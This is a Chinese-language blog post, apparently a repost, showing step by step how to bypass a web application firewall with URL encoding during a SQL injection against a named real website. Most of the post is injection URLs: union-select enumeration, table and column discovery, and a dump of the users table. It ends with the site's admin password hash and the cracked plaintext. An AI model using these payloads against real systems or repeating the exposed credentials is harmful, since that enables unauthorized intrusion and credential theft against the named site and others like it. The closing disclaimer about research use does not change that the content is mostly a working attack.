WAF绕过方法之URL编码

独自等待
独自等待
独自等待
503
文章
0
评论
2017年5月10日20:34:37评论1,029 views字数 1208阅读4分1秒阅读模式

实例讲解如何利用URL编码绕过WAF防护

WAF

SQL注入点

http://www.magrabiyemen.com/contents.php?id=3

字段数为4

http://www.magrabiyemen.com/contents.php?id=3 order by 4

显示位为4

http://www.magrabiyemen.com/contents.php?id=3 union select 1,2,3,4

显示基本信息正常

URL编码绕过WAF

http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version())

暴表的时候出现not acceptable

URL编码绕过WAF

http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()

尝试绕过,不成功,依然返回上图所示

http://www.magrabiyemen.com/contents.php?id=3 /*!12345UNION*/ /*!12345SELECT*/ 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()

使用URL编码成功绕过(t经过URL编码后为%74)

http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(%74able_name) from informa%74ion_schema.tables where %74able_schema=da%74abase()

URL编码绕过WAF

http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(column_name) from informa%74ion_schema.columns where table_name=CHAR(117, 115, 101, 114, 115)

URL编码绕过WAF

http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(username,0x3a,password) from users

URL编码绕过WAF

admin:ea4ce35c2860112178e8ae2285579919

解密出来为:admin/123456789987654321



from www.waitalone.cn.thanks for it.

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
独自等待
  • 本文由 发表于 2017年5月10日20:34:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   WAF绕过方法之URL编码https://cn-sec.com/archives/50169.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息